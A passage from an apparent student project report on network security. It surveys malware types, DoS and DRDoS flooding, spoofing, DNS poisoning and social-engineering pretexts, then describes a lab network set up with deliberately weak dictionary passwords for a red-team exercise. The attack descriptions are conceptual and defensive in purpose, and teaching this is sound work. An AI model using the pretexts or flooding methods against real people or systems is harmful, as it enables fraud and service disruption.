- If the packet is not protected, should it be accepted? This is essentially the "traditional"
packet filtering problem, as performed, e.g., by network firewalls.
- If the packet was encapsulated under the security protocol:
Is there correct key material (usually contained in a data structure called a “security
association") required to decapsulate it? Should the resulting packet (after decapsulation)
be accepted?
A second stage of packet filtering occurs at this point. Notice that a packet may be
successfully decapsulated and still not be accepted (e.g., a decapsulated packet might
contain an illegal network source IP address such as 127.0.0.1).
A security endpoint makes similar decisions when an outgoing packet is ready to be sent:
- Is there a security association (SA) that should be applied to this packet?
If there are several applicable SAs, which one should be selected?
38
- If there is no SA available, how should the packet be handled? It may be forwarded to
some network interface, dropped, or queued until an SA is made available, possibly after
triggering some automated key management mechanism such as the IPSEC ISAKMP
protocol.
Observe that because these questions are asked on packet-by-packet basis, policy filtering
must be performed, and any related security transforms applied, quickly enough to keep
up with network data rates. This implies that in all but the slowest network environments
there is insufficient time to process elaborate security languages, perform public key
operations, consult large tables, or resolve rule conflicts in any sophisticated manner.
Implementations of Network Layer Security services, including IPSEC and most
firewalls, therefore, usually employ very simple, filter-based languages for configuring
their packet-handling policies. In general, these languages specify routing rules for
handling packets that match bit patterns in packet headers, based on such parameters as
incoming and outgoing addresses and ports, services, packet options, etc.
2.6 Internal Network Security
Although focusing on securing the network’s perimeter is important, securing it internally
is equally important. If by some way a hacker manages to get in the network, he should
not be able to wander around easily without getting caught. Therefore, one should apply
the following to make the internal network secure:
39
• Patch and update all PCs before they are connected to the network, and then on a
regular basis. Note that patches need to be tested to avoid having problems with
databases or applications [3].
• System administrators should use one-time passwords only. In this way, in case a
hacker cracks the Admin’s password, it would only be valid for this one session.
An example of one-time password mechanism is the secur-ID by RSA [3].
• When an application is installed, some service accounts may be created. They are
accounts which do not have a human user associated to them. These accounts are
assigned default passwords that will most likely never be changed. Therefore, it is
important for an administrator to regularly change these passwords and monitor
the logs of these service accounts.
• Monitoring of logs is important: administrators should regularly read the logs to
monitor any unusual use of an account. Many freeware tools (such as log-IDS by
Adam Richard [3]) can help decipher the logs (which otherwise are almost
impossible to read) in something that the administrator can understand. Moreover,
by using a centralized syslog server, it will be much more difficult for hackers to
access them and edit them.
• Also, available freeware such as EventAlarm are useful when the Administrator
want to monitor a user’s logging in and out in a fast way. Such a freeware gives
pop out screen alarms to the administrator whenever user X or Y logs on or off.
Moreover, this freeware can be licensed and additional options could be added so
that alarms are given in various situations.
40
• Segregating the network can reduce vulnerabilities. In this way, a user will have
specific privileges and would not be able to access all parts of the networks (like
vital servers, or other department’s files). So if ever a hacker cracks a user ID and
password, less damage will be made if there is segregation: he won’t be able to
access the whole network.
If these rules are properly followed in our FYP, potential problems can be lessened
whether coming from a hacker that’s got in, or a legal user that has bad intentions.
2.7 Survey of Most Common Threats
We will begin explaining attacks automated by malicious code then we will explain
hacker attacks not automated by malicious code. DoS attacks will constitute a section on
their own due to the fact they are the most widespread attack on the Internet. We will end
this section by an explanation of social engineering attacks.
2.7.1 Attacks Automated by Malicious Codes
Malicious code is a piece of software which can damage or alter data and programs on a
system without permission and notice of the user. The sequence of instructions are used
to intentionally cause adverse affects to the system.
41
Figure 2.2: Classification of malicious code
We can see from the above figure that there are two types of malicious codes: needs host
program and independent. Needs host program are fragments of programs that can not
exist independently of some actual application program, utility or system program.
Independents are self contained programs that can be run by the operating system.
1. Trojan Horse
A Trojan horse is a malicious, security breaking program that is disguised as something
benign, such as a game, a directory lister or an archiver. The software is wrapped together
with the malicious code into a single file or program. The program appears to be
performing a useful function but it may also be quietly performing some harmful or
unwanted action such as deleting the victim’s files. The malicious code is typically a
back door, also known as an illicit server, but it can be a virus, worm or any other kind of
code that allows the attacker to do damage. The software is joined together with the
42
malicious code into a single file. Common ways to spread Trojan Horses are email, IRC
(Internet Relay Chat), and websites. An example of a Trojan horse file is: openme.gif.exe
(an extension is added to a seemingly harmless file). When the Trojan horse is executed it
will start its malicious job. If the job consist of planting a back door the attacker will be
notified (by email or IRC). Now the attacker can use the victim computer as a zombie in
a DDoS (Distributed Denial of Service; explained in a separate section later) attack to
flood a target system. The attacker can also remotely control the infected computer (open
the CD-ROM, send messages, open websites, reboot, listen to the microphone input,
delete files). The two most famous software to create back doors are BackOrrifice and
NetBUS. The backdoors are sent to the victim as Trojan horses (disguised as a harmless
program).
2. Virus
The virus is the most common type of malicious code. It can infect systems by attaching
itself to files and programs. Just like its biological counterpart, it needs a host to infect. A
virus is usually a program that needs to be executed by a user before it can do any
damage. For example, a virus attached to an email message is usually only harmful when
a user opens the attachment. Unlike a worm, a virus can not infect other computers
without assistance. It is propagated for example by humans trading programs with their
friends or by E-mail. The virus might only propagate itself and then allow the program to
run normally (without doing further damage). However, usually, after propagating
silently for a while, it starts doing things like writing cute messages on the terminal or
playing strange tricks with the display or even in extreme cases nuking the entire user’s
files.
43
So in summary the four phases of the life of a virus (after being executed) are:
The dormant phase (not all viruses have this stage): The virus is idle the virus will
eventually be activated by some event, such as a date, the presence of another program or
file, or the capacity of the disk exceeding some limit.
The propagation phase: The virus places an identical copy of itself into other programs or
into certain system areas on the disk. Each infected program will now contain a clone of
the virus, which will itself enter a propagation phase.
The triggering phase: The virus is activated to perform the function for which it was
intended. As with the dormant phase, the triggering phase can be caused by a variety of
system events such as a count of the number of times the virus has copied itself.
The execution phase: The function is performed. The function may be harmless, such as a
message on the screen, or damaging, such as the destruction of programs and data files.
There are also different types of computer viruses:
Figure 2.3: Main types of viruses
Memory-resident virus: Lodges in main memory as part of a resident system program.
From that point on, the virus infects every program that executes.
44
Program file virus: This is the most common type of virus; it attaches itself to executable
files such as .EXE and .COM. The file acts as a carrier and when the file is executed or
opened, the malicious code executes and the virus spreads to infect other files.
Figure 2.4 Program File Virus
Polymorphic virus: This type of virus has the ability to change its signature to avoid
detection by anti-virus software. It attempts to trick anti-virus software by slightly
modifying its own code when it spreads to other files. A polymorphic virus can modify
itself by encrypting or compressing part of its code.
Boot Sector Virus: This type of virus attaches itself to the boot sector of a floppy or hard
disk. When the computer boots, the virus will reside in its memory and infect other disks.
Modern main boards provide a BIOS option to enable boot sector virus protection, which
basically prevents modifications to the boot sector.
Stealth Virus: This type of virus attempts to hide itself to avoid detection by anti-virus
software. It attempts to misguide services that used to detect the virus. When the infected
file or boot sector is scanned by anti-virus software, the virus attempts to return the
properties of the original clean version of the file or boot sector.
45
Macro Virus: Macro viruses exploit vulnerabilities inherent to macro languages such as
Visual Basic in Microsoft Office. This type of virus is often found in Word documents.
When a user opens the document the malicious code is executed.
Email Virus: A more recent development in malicious software is the e-mail virus.
Rapidly spreading e-mail viruses make use of a Microsoft Word macro embedded in an
attachment. If the recipient opens the e-mail attachment, the Microsoft Word macro is
activated then: the e-mail virus sends itself to everyone on the mailing list in the user’s e-
mail package and the virus does local damage.
3. Worm
A worm is similar to a virus but there is one main important difference: a worm doesn’t
need to attach itself to a file or program to be reproduced and executed as a virus does. A
worm is self-contained, it can replicate itself and infect entire networks. Because of the
recursive structure of the propagation, the spread rate of worms is very fast and poses a
big threat on the Internet infrastructure as a whole. Examples of Worms are: MyDoom,
Netsky, Bagle, Blaster, Code Red, Nimda.
4. Logic Bomb
A logic bomb is a smart piece of malicious code that executes only when certain
conditions are met; it is triggered when a certain event occurs. An example is a virus that
executes on April Fool’s day (but infected the system long before that date) or a
format.exe command that is executed only when the user logs on with administrative
permissions. Another example of a logic bomb sends a note to the hacker when the
infected computer is on the internet and runs a specific application such as MS Word.
46
This bomb does not actually begin the attack but tells the hacker that the victim has met
needed state for an attack to begin.
Figure 2.5: Logic Bomb
1. Attacker implants logic bomb
2. Victim reports installation
3. Attacker sends attack message
Countermeasures against malicious code: Prevention and detection of malicious code
typically involves anti-virus and other detection products at gateways, mail servers, and
workstations. Those products generally scan messages for known signatures of a variety
of malicious code, or potentially dangerous behavioral characteristics. Differences
between products exist in detection capabilities and the range of malicious code included
in their signatures. Detection products should not be relied upon to detect all malicious
code. Additionally, anti-virus and other products that rely on signatures generally are
ineffective when the malicious code is encrypted. For example, VPNs, IPSec, and
encrypted e-mail will all shield malicious code from detection. Heuristic anti-virus
products generally execute code in a protected area of the host to analyze and detect any
hostile intent. Heuristic products are meant to defend against previously unknown or
47
disguised malicious code. Malicious code may be blocked at the firewall or gateway. For
example, a general strategy might be to block all executable e-mail attachments, as well
as any Active-X or Java applets. A more refined strategy might block based on certain
characteristics of known code. Protection of servers involves examining input from users
and only accepting that input which is expected. This activity is called filtering. If
filtering is not employed, a Web site visitor, for instance, could employ an attack that
inserts code into a response form, causing the server to perform certain actions. Those
actions could include changing or deleting data and initiating fund transfers. Protection
from malicious code also involves limiting the capabilities of the servers and Web
applications to only include functions necessary to support operations. An additional
detection control involves network and host intrusion detection devices. Network
intrusion detection devices can be tuned to alert when known malicious code attacks
occur. Host intrusion detection can be tuned to alert when they recognize abnormal
system behavior, the presence of unexpected files, and changes to other files.
2.7.2 Hackers Attacks (not automated by malicious codes)
1. Eavesdropping
The name eavesdropping comes from the fact that this technique involves secretly
listening to the data traveling through the attacked network. Other names for
eavesdropping include sniffing and snooping. Eavesdropping is only possible because
most data sent through connections are sent as plaintext and are unencrypted. Thus, a
hacker can just listen to the connection stream between the two connected users and get
whatever information he needs. This method is usually employed by those who are
unwilling to take large risks as this method is a very low-risk method. There is almost no
48
chance of getting caught when this method is used as no intrusion is involved and the
hacker can back off quickly without a trace if anything goes wrong. This method is also
used for those who want to listen to what is shared between two people, be it secret data
or just a personal conversation. In this respect, this method is the best for spies and
blackmailers.[14]
2. IP spoofing
Most networks and operating systems use the IP address of a computer to identify a valid
entity. In certain cases, it is possible for an IP address to be falsely assumed (identity
spoofing). An attacker might also use special programs to construct IP packets that
appear to originate from valid addresses inside the corporate intranet. After gaining
access to the network with a valid IP address, the attacker can modify, reroute, or delete
your data. The attack may be directed to a specific computer addressed as though it is
from that same computer. This may make the computer think that it is talking to itself.
This may cause some operating systems such as Windows to crash or lock up.
3. Man in the middle attack
As the name indicates, a man-in-the-middle attack occurs when someone between you
and the person with whom you are communicating is actively monitoring, capturing, and
controlling your communication transparently. For example, the attacker can re-route a
data exchange. When computers are communicating at low levels of the network layer,
the computers might not be able to determine with whom they are exchanging data.
Session hijacking occurs through the following scenario. First, the attacker watches a
session open on a network. Once authentication is complete, he attacks the client
computer to disable it, and use IP spoofing to claim to be the client who was just
49
authenticated and steal the session. Man-in-the-middle attacks are like someone assuming
your identity in order to read your message. The person on the other end might believe it
is you because the attacker might be actively replying as you to keep the exchange going
and gain more information.
Countermeasure: This attack can be prevented if the two legitimate systems share a
secret which is checked periodically during the session.
4. Server spoofing
A C2MYAZZ utility can be run on Windows 95 stations to request LANMAN (The
LanMan password hash is used by Windows NT for authenticating users locally and over
the network [16]) authentication from the client. The attacker will run this utility while
acting like the server while the user attempts to login. If the client is tricked into sending
LANMAN authentication, the attacker can read their username and password from the
network packets sent. [15]
Countermeasure: New operating systems are not vulnerable.
5. DNS poisoning
This is an attack where DNS information is falsified. This attack can succeed under the
right conditions, but may not be real practical as an attack form. The attacker will send
incorrect DNS information which can cause traffic to be diverted. The DNS information
can be falsified since name servers do not verify the source of a DNS reply. When a DNS
request is sent, an attacker can send a false DNS reply with additional bogus information
which the requesting DNS server may cache. This attack can be used to divert users from
a correct web server such as a bank and capture information from customers when they
attempt to logon. [15]
50
6. Password cracking
Sometimes in case of a partial break-in, the encrypted password file of a company might
be exposed to a hacker (or cracker in that case). If it happens, the attacker will start
password cracking the file, namely trying all the possible combinations with the idea to
find the weakest passwords and gain privileges later on. [17]
Countermeasure: In case the company is aware that its passwords' file has been
compromised, it should immediately notify all employees to change their passwords, so
even if weak passwords are exposed, they wouldn't be valid ones anymore. However, if
the company is not aware of its password file exposure, it should constantly try to crack
its password file just like an attacker would do and filter out the weakest passwords.
2.7.3 DoS
A DoS (Denial of Service) attack is an attempt to prevent legitimate users of a service or
network resource from accessing that service or resource. DoS attacks are not targeted at
stealing, modifying or deleting information.. A DoS attack comes in many forms like
cutting of the power to a system or flooding a system with seemingly legitimate network
traffic, anything that will results in a denial of service. DoS attacks usually make use of
software bugs to crash or freeze a service or network resource, or bandwidth limits by
making use of a flood attack to saturate all bandwidth.
Different methods of DoS:
• DoS
DoS attack is when the attacker launches an attack from his or her own computer, this
is done by sending packets of data to the remote computer, for each packet sent the
target machine receives one. This is a very uncommon form of denial of service
51
because the attack most of the time is very unsuccessful and at times can be easily
traced. DoS attacks are usually carried out by amateur script kiddies.
Figure 2.6: DoS
• DDoS
A distributed denial of service attack is when an attacker attacks from multiple source
systems. DDoS attack is generally more effective to bring down huge corporate sites
than DoS attacks. The attacker can put in order a large number of computers to
connect to a website at the same time. The web server has a maximum allowed
number of client connections. If this number is attained, the server will deny further
connections. So there will be a denial of service. Usually the attacker does not own all
these computers so he uses Trojan horses with back doors as malicious code to infect
computers which become zombies (also called “secondary victims”). The users of the
infected computers are not aware that their computers are used in a DDoS attack. DoS
bots (small word for robot, program for flooding present on the secondary victims
computer) usually have standard flooding, such as ICMP, UDP, TCP, and SYN
Flooding. The Internet services and resources under the attack are “primary victims”.
52
A typical DDoS attack consists of master, slave, and victim. Master being the
attacker, slave being the compromised systems and victim being the attacker’s target.
Figure 2.7: DDoS Attack
• DRDoS
DRDoS is when an attacker sets his bots to flood different intermediate hosts with
spoofed packets. For example the attacker sets half his bots to flood yahoo.com with
spoofed ICMP packets and half ebay.com with spoofed ICMP packets. The spoofed
packets seem to have microsoft.com as a source so yahoo.com and ebay.com flood
microsoft.com (ebay.com and yahoo.com will reply to the spoofed source). For each
packet the attacker sends to yahoo.com or ebay.com, yahoo.com or ebay.com may
have thousands of machines on the same IP Address. Each of these machines will
reply to the spoofed ICMP packet therefore amplifying the power of the attack
greatly.
53
Figure 2.8: DRDoS- Red Lines: Connection from attacker computer to zombies computers. Blue Lines: Zombies sending spoofed ICMP packets. The ICMP packets look like they come from the Internet Core router the attacker wants to attack. Green Lines: Each of the computers connected to ebay.com, yahoo.com, cnn.com and Amazon.com are replying to the spoofed ICMP packets therefore flooding the Internet core router.
54
Figure 2.9 DRDoS- Malicious SYN packets are being "Reflected" off innocent TCP servers. Their SYN/ACK responses are being used to flood and attack the target network. There are also different Types of DoS Attacks:
• TCP SYN Flood Attack
A TCP session is established by using a three-way handshake mechanism, which
allows the client and the host to synchronize the connection and agree upon the initial
sequence numbers. When the client connects to the host, it sends a SYN request to
establish and synchronize the connection. The host replies with a SYN / ACK, again
to synchronize. Then the client acknowledges it received the SYN/ ACK packet by
sending and ACK. When the host receives the ACK the connection will become
OPEN, allowing traffic from both sides (full-duplex). The connection remains open
55
until the client or the host issues a FIN or RST packet, or the connection times out. If
you flood a remote computer with SYN packets it is going to send back a SYN/ACK
packet so bandwidth will be wasted. In addition, in a TCP SYN flood attack the
connection is not completed so the target computer is left waiting for an ACK,
therefore it is possible to max out the remote computers connection queue.
Connections from legitimate users will be rejected in this case. The amount of
bandwidth this attack uses is very minimal, although if done on a very large scale it
could affect the bandwidth of a web server.
Figure 2.10: TCP 3 way handshake
Countermeasure: Many routers and other network nodes today are able to detect SYN
floods by monitoring the amount of unacknowledged TCP sessions and kill them
before the session queue is full. They can often be configured to set the maximum
allowed number of half-open connections, and limit the amount of time the host waits
for the final acknowledgement. Without these preventive measures, the server could
eventually run out of memory, causing it to crash entirely.
• UDP Flood Attack
56
UDP flooding is when the attacker sends garbage packets from UDP port(s) to UDP
port(s) on the remote computer, since UDP is a connectionless protocol (no
handshake mechanism) UDP flooding can be very effective and easy to abuse for
flood attacks. A common type of UDP flood attack often referred to as a Pepsi attack,
is an attack in which the attacker sends a large number of forged UDP packets to
random diagnostic ports on a target host. The CPU time, memory, and bandwidth
required to process these packets may cause the target to become unavailable for
legitimate users.
Countermeasure: To minimize the risk of a UDP flood attack, disable all unused
UDP services on hosts and block the unused UDP ports if you use a firewall to
protect your network.
• Ping of Death Attack
An oversized ICMP datagram (size larger than 65,535 bytes) can crash IP devices that
were made before 1996 (Windows 95, NT4).
Countermeasure: Modern operating systems and network devices safely disregard
these oversized packets. Older systems can usually be updated with a patch.
• Smurf Attack
An attack where a ping request is sent to a broadcast network address with the
sending address spoofed so many ping replies will come back to the victim and
overload the ability of the victim to process the replies. This attack is made possible
mostly because of badly configured network devices that respond to ICMP echoes
sent to broadcast addresses. The amount of traffic sent by the attacker is multiplied by
57
a factor equal to the number of hosts behind the router that reply to the ICMP echo
packets.
Figure 2.11: Smurf Attack
Besides the target system, the intermediate router is also a victim, and thus also the
hosts in the bounce site. A similar attack that uses UDP echo packets instead of ICMP
echo packets is called a Fraggle attack.
Countermeasure: It is difficult to prevent Smurf attacks entirely because they are
made possible by incorrectly configured networks from a third party. The Smurf
Amplifier Registry (SAR) http://www.powertech.no/smurf/ Netscan.org is one of
several publicly available databases that can be used to configure routers and
firewalls to block ICMP traffic from these networks. The Smurf Amplifier Registry
(SAR) can be downloaded in Cisco ACL format. If you use Cisco routers, make sure
all interfaces are configured with the no ip-directed broadcast command (default
since IOS 12.0).
58
• Teardrop Attack
A normal packet is sent then a second packet is sent which has a fragmentation offset
claiming to be inside the first fragment. This second fragment is too small to even
extend outside the first fragment. This may cause an unexpected error condition to
occur on the victim host which can cause a buffer overflow and possible system crash
on many operating systems. [15]
Countermeasure: Today’s implementations of the TCP/IP stack safely disregard such invalid packets.
2.7.4 Social Engineering
Before an attacker attempts to gain access to a secured system, he must first know certain
things about the target system. Although an attacker often uses technology, he may
simply try to ask for the information. If the right person asks, he or she will often get it all
too easily.
Social Engineering is the art of having people do what you want, or give you info on
passwords and almost anything, without them knowing they are doing so. Social
Engineering applies to every aspect of the internet and also to the real world.
This can start with a simple chat in a chat room or a phone call to a business that
someone wants to maybe gain access too from the internet without having to hack in. In a
business situation of social engineering, the hacker starts doing research on the company
so he will most likely know every department that the company has. He could then try to
phone up a department and say he was a member of the IT department and that the
passwords are being changed for routine security reasons then he would tell the user to
change his/her password to what ever he wants. He could then simply logon to their
system using the new password and he’s in.
59
A social engineering attack usually involves an attacker impersonating a seemingly
harmless person to deceive company personnel to obtain information. Obtaining that
information may be the actual goal itself, or it may be used to aid the attacker in
penetrating a secured system. The information can be a user ID, password, access code
and other type of sensitive information, but can also be information that seems harmless
to share. A company phoned by a student conducting a survey about which operating
systems and software they use may actually be giving valuable information to a malicious
attacker. Malevolent competitors and ex-employees who want to settle a score, sabotage a
business, or steal a company secret often use social engineering techniques to reach their
malicious goals.
Social engineering attacks are often more complicated and require careful preparation,
acting and persuasion skills. A social engineer collects bits and pieces of information that
will lead him to his goal, typically using its most valuable tool, a phone. Calling a
company and bluntly ask for the information may alarm the employee on the other side of
the phone and ruin the entire attack before it really got started. So before the attacker can
persuade a victim to simply hand out information, he needs to crawl into the skin of
someone the victim will gladly give the information to, someone who works in the same
company for example. To do that he needs to know the company’s lingo, department
structure, internal phone numbers, and anything else that will make him an “insider”.
Once the attacker talks the talk, knows who to impersonate and who to ask what, it is just
a matter of asking the right questions without raising any suspicion to get everything he
wants.
60
Social engineers have found a relatively new way to attempt to obtain sensitive
information from naïve people, without having to pay them a visit or call them by phone:
email. The attacker sends malicious e-mail messages that seem to be legit and even have
a valid sender address. The message may contain a link that takes the victim to a website
that looks exactly like a site where he or she frequently buys online products with a credit
card number. Or the message may seem to have been sent by the IT department, and
includes an attachment that is supposedly the latest anti-virus update that must be
installed immediately. In reality, the attachment could be a Trojan horse creating a
backdoor for the attacker or logging keystrokes that are sent to the attacker by e-mail.
The most important thing in social engineering is building trust. If a hacker builds up
some trust with a user then he is going to find it easier to manipulate him to do what he
wants.
Countermeasure: Many companies acknowledged the necessity of technology such as
firewalls, intrusion detection systems, and advanced authentication systems to secure
their information. However, this technology does not make them less vulnerable to a
social engineer. It may actually lead to a false sense of security, which may make them an
even easier target. To prevent successful social engineering attacks security policies must
be implemented and enforced. All employees must be informed and trained to recognize
and appropriately respond to a potential social engineering attack.
One of the most important policies that should be implemented is verification of requests.
Not only the identity of the requestor should be verified, but also the request he or she is
making. A simple method to verify the caller’s ID is to call the person back at the phone
number listed in the company’s phone directory. If someone outside the company asks for
61
inside information, he or she should be forwarded to a manager or the Information
Security department. When a copier maintenance person enters a building, the
receptionist should verify the appointment and ask for an ID.
The best defense against social engineering attacks by e-mail is using certificates for
encrypting and signing e-mail messages, allowing a recipient to positively identify the
sender.
By following some basic rules and using common sense, most social engineering attacks
can be prevented. It is essential to educate employees about these types of attacks and the
methods of a social engineer, because in any security system people are really the
weakest link.
62
3. Our Network Design
We now tackle the design part of our FYP, i.e. building our Network.
Mr. Ziad Shaaban, from the computer labs, provided our team with 4 Pentium3
computers (that we will place in Mr. Khaled Joujou’s lab). Therefore, we agreed with Mr/
Majari that our network will include: one Windows and one UNIX workstation, in
addition to one windows and one UNIX server.
3.1 Topology
The network topology refers to its shape, or its layout. The topology defines how nodes
are connected to each others and how they communicate between them [8]. The figure
below illustrates the most common network topologies.
Figure 3.1: Network Topologies [8]
As was described in section 1 of this report, the most common topologies businesses use
are hierarchal stared networks. Therefore, we have decided to use this kind of topology
when building our network, since the ultimate goal is to simulate we are a business firm.
63
3.2 Securing the Perimeter
The most common way of implementing Perimeter Security is using Firewalls [9]. A
large array of Firewall exist today, each brand (and even each model within brand) focus
on better security for a given networked environment. From a hacker’s perspective, there
are numerous targets: Router, Switches, Hosts, Application, but also the network as a
whole (DoS attacks).
Firewalls are hardware devices (though some software firewalls exist), that filter
information coming through and out of a secured network. Firewalls generally use the
following methods to do their job [10]:
• Packet filtering - Packets (small chunks of data) are analyzed against a set of
filters. Packets that make it through the filters are sent to the requesting system
and all others are discarded.
• Proxy service - Information from the Internet is retrieved by the firewall and then
sent to the requesting system and vice versa.
• Stateful inspection - A newer method that doesn't examine the contents of each
packet but instead compares certain key parts of the packet to a database of
trusted information. Information traveling from inside the firewall to the outside is
monitored for specific defining characteristics, and then incoming information is
compared to these characteristics. If the comparison yields a reasonable match,
the information is allowed through. Otherwise it is discarded.
Some common Firewall Filters (for inside-to-outside protection) are [11]:
64
• IP addresses - For example, if a certain IP address outside the company is reading
too many files from a server, the firewall can block all traffic to or from that IP
address.
• Domain names - A company might block all access to certain domain names, or
allow access only to specific domain names.
• Protocols - A company might set up only one or two machines to handle a
specific protocol and ban that protocol on all other machines. Protocols include:
IP, TCP, HTTP, FTP, UDP, ICMP, SMTP, SNMP, Telnet…
• Ports - Any server machine makes its services available to the Internet using
numbered ports, one for each service that is available on the server. For example,
if a server machine is running a Web (HTTP) server and an FTP server, the Web
server would typically be available on port-80, and the FTP server would be
available on port 21. A company might block port-21 access on all machines but
one inside the company.
• Specific words and phrases - This can be anything. The firewall will sniff (search
through) each packet of information for an exact match of the text listed in the
filter and block any packet with the word or phrase.
Firewalls can protect or help protect us (with additional hardware and software) from
(outside-to-inside security):
• Remote login - When someone is able to connect to your computer and control it
in some form. This can range from being able to view or access your files to
actually running programs on your computer.
65
• Application backdoors - Some programs have special features that allow for
remote access. Others contain bugs that provide a backdoor or hidden access,
which provides some level of control of the program.
• SMTP session hijacking - SMTP is the most common method of sending e-mail
over the Internet. By gaining access to a list of e-mail addresses, a person can
send unsolicited junk e-mail (spam) to thousands of users. This is done quite
often by redirecting the e-mail through the SMTP server of an unsuspecting host,
making the actual sender of the spam difficult to trace.
• Operating system bugs - Like applications, some operating systems have
backdoors. Others provide remote access with insufficient security controls or
have bugs that an experienced hacker can take advantage of.
• Denial of service - This type of attack is nearly impossible to counter. What
happens is that the hacker sends a request to the server to connect to it. When the
server responds with an acknowledgement and tries to establish a session, it
cannot find the system that made the request. By inundating a server with these
unanswerable session requests, a hacker causes the server to slow to a crawl or
eventually crash.
• E-mail bombs - An e-mail bomb is usually a personal attack. Someone sends you
the same e-mail hundreds or thousands of times until your e-mail system cannot
accept any more messages.
• Macros - To simplify complicated procedures, many applications allow you to
create a script of commands that the application can run. This script is known as a
66
macro. Hackers have taken advantage of this to create their own macros that,
depending on the application, can destroy your data or crash your computer.
• Viruses - Probably the most well-known threat is computer viruses. A virus is a
small program that can copy itself to other computers. This way it can spread
quickly from one system to the next. Viruses range from harmless messages to
erasing all of your data.
• Spam - Typically harmless but always annoying, spam is the electronic equivalent
of junk mail. Spam can be dangerous though. Quite often it contains links to Web
sites. Be careful of clicking on these because you may accidentally accept a
cookie that provides a backdoor to your computer.
• Redirect bombs - Hackers can use ICMP to change (redirect) the path information
takes by sending it to a different router. This is one of the ways that a denial of
service attack is set up.
• Source routing - In most cases, the path a packet travels over the Internet (or any
other network) is determined by the routers along that path. But the source
providing the packet can arbitrarily specify the route that the packet should travel.
Hackers sometimes take advantage of this to make information appear to come
from a trusted source or even from inside the network! Most firewall products
disable source routing by default.
It is evident that some of the above attacks are very hard to prevent just using a firewall,
and other software/hardware devices are needed [9].
67
3.3 Our Network
With the 4 computers available, we have researched computer stores in the great Beirut
area for firewalls and switches. We found a very interesting product that suits our needs:
the Linksys BEFSX41 EtherFast Cable/DSL Firewall Router w/ 4-Port Switch/VPN
endpoint.
Basically, this product has a 4 port built in switch, VPN Endpoint, VPN Pass-Thru,
Firewall and DHCP Server functionalities [14].
Its security functionalities are as follow: IPSec Pass-Thru • PPTP Pass-Thru • SPI
(Stateful Packet Inspection) • DoS (Denial of Service) Attack Detection • URL Content
Filtering • DMZ • Cookies Blocking • Java Blocking • ActiveX Blocking • NAT [14]
This product was found at www.pcandparts.com, a Lebanese online computer store, for
only 89.00$.
The following is an illustration of our network:
68
4. Installing the Network
At the beginning of the spring semester, the FEA IT Unit provided us with four
computers equipped with pentium2 processors, having 1.5GB hard disk and 64MB
Memory. Clearly, these computers’ specifications were not to today’s standard. We
therefore decided to work on windows 2000 (1 server, 1 workstation) and Fedora Core 3
(also 1 server and 1 workstation).
However, for windows to work properly, we had to increase the Memory of the 2
computers we were going to install windows OS on from 64MB to 256MB (keeping in
mind that these were scarce SD-RAMS). Moreover, to not have problems with Hard Disk
space and stay on the safe side, we replaced all the 1.5GB drives by 3GB drives. In
addition to this, the computer on which we wanted to install the Fedora Server had a
faulty CD Drive, which prompted us to change it with a new one.
Also, when installing the Fedora Core 3 OS, we were having problems with incomplete
and very slow installation processes due to the low memory space (64MB). Since it was
unnecessary to buy additional memory (Fedora 3 works fine on 64MB), we had to
manually unplug memory from the computers equipped with windows and use them in
the Fedora PCs just for the installation time.
All in all, installing the OS on the four different computers was a lengthy process due to
the low specifications and faulty hardware on the PCs we were provided with.
69
4.1 Plugging the Network and Creating a Domain
Now that our 4 PCs were up and running, it was time to plug them to the Linksys device
(firewall/router with 4 port switch), configure the device and create a domain with
different users.
4.1.1 Setting Up the Linksys Product
First, we started by defining the IP addresses. The external IP address (i.e. Router IP
address) was chosen to be 192.168.1.1 (with subnet mask of 255.255.255.0). The internal
network IP addresses were 192.168.100.100 for the Windows workstation,
192.168.100.101 for the Windows server, 192.168.100.102 for the Fedora workstation
and 192.168.100.103 for the Fedora server. Note that “Natting”, which allows multiple
computers to share on internet connection, was enabled. At first, we thought that giving
IP addresses on the external and internal side who roughly looked the same would be
dangerous. But with Honey-Potting options (see section 4.5) this is not a big threat.
As for the firewall security settings, we started by setting then to maximum security. We
enabled Stateful Packet Inspection (SPI), as well as enabled filtering the Proxy, Cookies,
Java Applets and ActiveX. Also, we blocked anonymous internet requests to enable the
router to drop unaccepted TCP requests and ICMP packets from the internet (in our case,
from the hackers). Note that this feature can be disabled in the case the Hackers’ team is
unsuccessful in their outside attacks. Another important aspect of firewall security is
closing port 113. This port is a service port that most applications do not need. Closing it
would prevent intruders from attacking the router through the internet. Again, if the
70
hackers’ team is unsuccessful in attacking us with this feature on, we can open port 113
to help them.
The firewall also has a feature that can restrict internet access (i.e. the device will only
work as a simple switch) all the time or during certain period of time. However, we
turned that option off as a company would ideally have internet access 24 hours a day.
Finally, an important feature that we recommend to use in the firewall is the “Log
Feature”. The Log screen provides information on all the log activities. Downloading a
logviewer software can also enhance this option by generating files to keep permanent
record of the log activities. The option permits the user to:
• Get logs of all incoming and outgoing activities (useful when running website or
FTP server).
• Get system logs, i.e. activities such as warm boot and access to the router based
utility.
• Get access logs, i.e. keep track of all incoming and outgoing activities via the
internet (in our case, the hackers’ team will connect in the internet port).
By monitoring those log files regularly, our team can know when the hackers tried to
attack our system from the outside by sending packets for example.
4.1.2 Creating the Domain
We created a Kerberos domain on the windows 2000 server that we called FYP. Also, as
a requirement put forth by Deloitte, we created about 20 user accounts that we distributed
in different user groups having different prerogatives and power. These users were given
consistent usernames (e.g. jmoukarzel for Jean Moukarzel) and dictionary words
71
passwords, as a request from Deloitte, to simulate real life situations where most
employees set easy passwords for their accounts.
4.2 Tightening Security
After setting up the domain and firewall/router settings, the next step is to tighten our
network’s security.
4.2.1 Patches on Windows
Installing service packs and patches is really important on windows 2000. One should
always check the Microsoft website for any updates and download the newest patches
and service packs to make sure the network is secure. This is precisely what we did, by
downloading the patches talked about in section 2.4. Also, in section 4.4, we will see
what tool can be used to update security.
4.2.2 Disabling USB ports to Protect Against Flash Drives
Flash drives are small solid state memory sticks that are about the size of a highlighter
pen and can hold anywhere from 1Mb to 1GB of data. They're incredibly light weight,
very portable (some models function as key chains) and they are compatible with any PC
equipped with a USB port and running Windows 2000/XP, Mac OS 9-10X or Linux
2.4.17. (Windows 9x PC's require a one time driver installation). USB Flash Drives have
fast transfer rates (1Mb/sec), no moving parts, and they don't require a separate power
source or batteries. Using flash drives is very simple: they just have to be plugged into
the USB port of the PC and Windows plug and play will immediately see it as an
additional drive. Flash drives hold more data than a floppy, are more portable than ZIP
72
drives and other remote storage devices, and more convenient (and less fragile) than CD-
RW disks. In short, USB Flash Drives may just be the perfect and most affordable
removable storage medium.
Needless to say, USB Flash Drives are very useful, but they also introduce big threats to a
company’s network, such as [18]:
